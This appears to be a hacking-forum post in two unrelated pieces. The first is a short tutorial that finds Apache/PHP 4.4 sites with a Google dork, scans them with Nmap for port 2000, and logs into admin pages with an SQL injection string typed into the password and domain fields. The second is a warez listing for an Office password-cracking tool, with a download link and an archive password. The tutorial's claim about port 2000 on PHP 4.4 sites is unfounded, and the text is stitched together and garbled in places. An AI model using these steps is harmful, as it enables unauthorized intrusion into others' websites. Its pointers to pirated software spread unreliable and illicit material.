Simple Nmap Scanning

In the mean time,here is how you can start -
Step 1 – Search for them
Yep,make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.
Step 2 – Scan them
Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.
Now just login using port 2000 ie -

http://www.website.com:2000

and you will be comfortably login into admin page like this -

Step 3 – Hack them
Now in the fields,you have to type -

username – admin
password – a’ or 1=1 or ‘b
domain - a’ or 1=1 or ‘b

and press go,you will login into admin

voila..you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 20 seconds.
I hope that was informative :P go learn something.

Cheers

Advanced Office Password Breaker Pro 2.0

Description:
Forgetting a password to your own Word document or Excel worksheet is surely annoying,
but interfering with the office workflow causes substantial damage. If youÆre not in
hurry, you can try guessing the password. If you have no time to play games, just unlock
your documents and spreadsheets û guaranteed! No matter how long and complex your
passwords are, Advanced Office Password breaker recovers Word documents and Excel
spreadsheets within a limited timeframe. No need to perform lengthy attacks while a
40-bit encryption key can be crunched quickly and efficiently, and more importantly,
with a guaranteed positive result.

Advanced Office Password Breaker unlocks documents created with Microsoft Office Word
and Excel 97 and 2000, as well as documents saved with Microsoft Office XP and 2003
in Office 97/2000 Compatibility Mode.

Download Now

Password for rar file : appz-http://wareznet.net/

Size:
0.812 MB

Source